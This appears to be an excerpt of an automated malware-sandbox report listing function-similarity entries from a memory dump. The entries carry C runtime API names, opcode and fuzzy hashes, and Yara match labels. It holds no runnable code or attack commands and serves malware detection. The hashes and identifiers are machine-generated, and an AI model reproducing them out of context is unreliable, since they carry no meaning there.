            • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
            • String ID: leM
            • API String ID: 3569886845-2926266777
            • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction ID: 3686f83e5927444b1ae10f4077203a7364631d302438fbffa4a72225ec949ce5
            • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction Fuzzy Hash: 2D11F879C0020DBBCF00FFA5D859CEEBBBDAA04344F40C966AD5997644EB74A3488F94
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free_malloc_wprintf$_sprintf
            • String ID:
            • API String ID: 3721157643-0
            • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction ID: f876040c2d757ade47fbcc7a765b34c407df20ab67516b48878fca79d609094c
            • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction Fuzzy Hash: 4B11E4B69005647AC272A6F95C11FFF7ADD9F46702F0400A9FE8CE5180DB685B049BB1
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset$_malloc_sprintf
            • String ID:
            • API String ID: 65388428-0
            • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction ID: 0eabf67edaf6541174ab66dc225694c78be7265aaa56e184c3e2d0da984091fa
            • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction Fuzzy Hash: E9516D71D40219ABDB21DBA5DC85FEFBBB9FF04704F100026F949B6290EB746A018FA5
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction ID: 293e6a58febed728ac6eba7eeb0e41b9c33c036eff16a5fd6bdeaf122460393e
            • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction Fuzzy Hash: E6514EB1D40209EADF11DFA1DC46FEEBBB9EB04704F104129F905B6190E775AA058BA5
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction ID: 818f203e9575adc64d089ce582df7a82b3d0df55f8fe57d1c6bf085353250fdd
            • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction Fuzzy Hash: A3515172E40219AADF21DFA1DC45FEEBBB9EB04704F104129F905B6290EB746A058BA4
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
            • String ID:
            • API String ID: 3534693527-0
            • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction ID: a8007f6a5035181566b3c178df0a9a41c5c3c578e11b35706c1cfa79b71941fa
            • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction Fuzzy Hash: 4031C372A00625ABDF316B64DC04F6F77A9AF45B68F144425ED08EB284DB7C8541CAB1
            APIs
            • __getptd_noexit.LIBCMT ref: 023F66DD
              • Part of subcall function 023559BF: __calloc_crt.LIBCMT ref: 023559E2
              • Part of subcall function 023559BF: __initptd.LIBCMT ref: 02355A04
            • __calloc_crt.LIBCMT ref: 023F6700
            • __get_sys_err_msg.LIBCMT ref: 023F671E
            • __invoke_watson.LIBCMT ref: 023F673B
            • __get_sys_err_msg.LIBCMT ref: 023F676D
            • __invoke_watson.LIBCMT ref: 023F678B
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
            • String ID:
            • API String ID: 4066021419-0
            • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction ID: 49251c73d597d88d9b138a833deaae9637088babfcee4037031c877b2bb1a66b
            • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction Fuzzy Hash: 5911BF726006247BEB756E25AC02FBA739DDF407A4B000426FF28A6640EB25ED444EE4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: D
            • API String ID: 2102423945-2746444292
            • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction ID: 4c93ab17ad344fda5fc6a961e82765393d4be12d2abdfd55a7ea398683eb75ab
            • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction Fuzzy Hash: CCE14C71D00219AADF24DFA0DD89FEFBBB9BF04704F1440A9EA09B6190EB746A45CF54
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: $$$(
            • API String ID: 2102423945-3551151888
            • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction ID: 43e47ec7d7cd3e508f5ac7038410db919ec8c8891b572f36d711f50fe74f0fce
            • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction Fuzzy Hash: 7191AE71D0021CABEF21CFA0DC49BEEBBB9AF05304F2441A9D50577281DBB66A48CF65
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _wcsnlen
            • String ID: U
            • API String ID: 3628947076-3372436214
            • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction ID: 94926a25b127b40524d1c8967964ef0e030988c2062a9c8da04660921f08d4a4
            • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction Fuzzy Hash: 7A21D832618328AAEB109AA49C45FBA73EDDB45760FD04165ED0CC6190FB71F9448AA4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: p2Q
            • API String ID: 2102423945-1521255505
            • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction ID: 823a93cc5f6d2a5504fa65f4b5116de5be2d929f87761733f9b1be17337798b4
            • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction Fuzzy Hash: FAF0E578694790A5F7217B50BC26B857DD27B31B08F104045D5182E2E5D3FD234C6B99
            APIs
            • std::exception::exception.LIBCMT ref: 0237FBF1
              • Part of subcall function 0236169C: std::exception::_Copy_str.LIBCMT ref: 023616B5
            • __CxxThrowException@8.LIBCMT ref: 0237FC06
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
            • String ID: TeM$TeM
            • API String ID: 3662862379-3870166017
            • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction ID: 1ca957fdb7e07d47e6c47ba3be11d85b90be003e84554d4c37b8110593f35539
            • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction Fuzzy Hash: EAD06779C0020DBBCB00EFA5D459CDDBBBDAA04344B00C466AD5997245EA74A3498FD4
            APIs
              • Part of subcall function 0235197D: __wfsopen.LIBCMT ref: 02351988
            • _fgetws.LIBCMT ref: 0233D15C
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: __wfsopen_fgetws
            • String ID:
            • API String ID: 853134316-0
            • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction ID: f2f05eab0507bfbe0bc546f5736b1342e501dfe2ae274f6af82efc4d6d493e43
            • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction Fuzzy Hash: 0B919072D10319ABCF22DFA4CC85BAEB7B5BF04314F140569E819A3240E776EB54CBA5
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _malloc$__except_handler4_fprintf
            • String ID:
            • API String ID: 1783060780-0
            • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction ID: 69dc869ea8ae39c42e0f28893a8ce8d827772f4dd75ed3f8f11d88b7b736d157
            • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction Fuzzy Hash: 6AA14FB1C00258DBEF21EFE4DC45BDEBBB6AF15304F140128D9057A291D7B66A48CFA6
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
            • String ID:
            • API String ID: 2974526305-0
            • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction ID: 631a0ad82eb131a346e61d6c71aff256466e500c06eaaa40678437f00f3458a9
            • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction Fuzzy Hash: 79519170A00B259BDB298F79C884E6FB7B6AF40324F148729EC3D966D1D7719951CF40
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction ID: 3822b8a62bc0d10877612fe8b8b6170b5d4cebd5d8e54dc7f5945f8c10bd2826
            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction Fuzzy Hash: 5E01483340014AFBDF225E84DC41CEE3FA7BB19355B488415FAAD58930D33AC5B2AB81
            APIs
            • ___BuildCatchObject.LIBCMT ref: 023F7A4B
              • Part of subcall function 023F8140: ___BuildCatchObjectHelper.LIBCMT ref: 023F8172
              • Part of subcall function 023F8140: ___AdjustPointer.LIBCMT ref: 023F8189
            • _UnwindNestedFrames.LIBCMT ref: 023F7A62
            • ___FrameUnwindToState.LIBCMT ref: 023F7A74
            • CallCatchBlock.LIBCMT ref: 023F7A98
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
            • String ID:
            • API String ID: 2901542994-0
            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction ID: 316d32b1c5a170f1189dccdf77caced58907bcc69ffd53bf9b5ef1f6774b5712
            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction Fuzzy Hash: FD01E932100109BBDF62AF55EC01EEA7BBAFF48754F158114FE1866221D732E961DFA0